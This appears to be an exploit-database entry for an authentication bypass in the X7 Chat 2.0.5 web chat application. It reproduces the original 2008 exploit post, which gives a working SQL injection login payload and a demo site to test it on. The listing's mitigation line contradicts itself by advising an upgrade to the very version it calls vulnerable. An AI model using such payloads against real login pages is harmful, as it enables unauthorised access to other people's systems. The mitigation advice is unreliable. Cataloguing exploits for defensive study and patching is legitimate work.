header-logo
Suggest Exploit
vendor:
X7 Chat 2.0.5
by:
ZoRLu
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: X7 Chat 2.0.5
Affected Version From: 2.0.5
Affected Version To: 2.0.5
Patch Exists: Yes
Related CWE: N/A
CPE: a:x7chat:x7_chat
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Web
2008

Powered By X7 Chat 2.0.5 auth bypass

An authentication bypass vulnerability exists in X7 Chat 2.0.5. An attacker can exploit this vulnerability to gain access to the application without authentication. The attacker can use the username 'ZoRLu' and password ' or ' 1=1-- to bypass authentication.

Mitigation:

Upgrade to the latest version of X7 Chat 2.0.5
Source

Exploit-DB raw data:

[~] Powered By X7 Chat 2.0.5 auth bypass
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 14.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] my bug number now: 42
[~]
[~] my target bug number: 100
[~]
[~] -----------------------------------------------------------


Exploit:

username: ZoRLu or anything write

password: ' or ' 1=1--


login for demo:

http://x7chat2demo.hostx7.com/

username: ZoRLu

password: ' or ' 1=1--

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-14]